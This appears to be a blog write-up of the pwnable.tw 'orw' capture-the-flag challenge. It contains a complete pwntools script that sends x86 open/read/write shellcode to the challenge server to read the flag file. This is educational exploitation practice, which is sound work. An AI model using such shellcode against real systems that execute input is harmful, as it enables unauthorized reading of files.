Challenge
Solving
running binary :
and part of main disassembly :
Binary reads our payload and store it at the address 0x8048370, then it runs the code there.
As the problem description says, maybe we should make a shellcode only with open, read, write syscall.
Here is my python script
#!/usr/bin/env python
# pwnable.tw orw
from pwn import *
debug = 0
def exploit():
shellcode = ''
shellcode += asm('mov eax, 0x5') # syscall : open
shellcode += asm('mov ebx, 0x804a09c') # filename
shellcode += asm('mov ecx, 0x0') # flags
shellcode += asm('mov edx, 0x804a0ab') # mode
shellcode += asm('int 0x80')
shellcode += asm('mov ebx, eax') # fd
shellcode += asm('mov eax, 0x3') # syscall : read
shellcode += asm('mov ecx, 0x804a100') # buf
shellcode += asm('mov edx, 0x64') # count
shellcode += asm('int 0x80')
shellcode += asm('mov edx, eax') # count
shellcode += asm('mov eax, 0x4') # syscall : write
shellcode += asm('mov ebx, 0x1') # fd
shellcode += asm('mov ecx, 0x804a100') # buf
shellcode += asm('int 0x80')
shellcode += '/home/orw/flag\x00'
shellcode += 'r\x00'
s.send(shellcode)
if __name__ == '__main__':
if debug:
s = process('./orw')
pause()
else:
s = remote('chall.pwnable.tw', 10001)
exploit()
s.interactive()
s.close()
FL4G
'pwnable.tw' 카테고리의 다른 글
| [pwnable.tw] Silver Bullet writeup (0) | 2018.10.11 |
|---|---|
| [pwnable.tw] hacknote writeup (0) | 2018.10.11 |
| [pwnable.tw] dubblesort writeup (0) | 2018.10.11 |
| [pwnable.tw] calc writeup (0) | 2018.10.11 |
| [pwnable.tw] start writeup (0) | 2018.09.29 |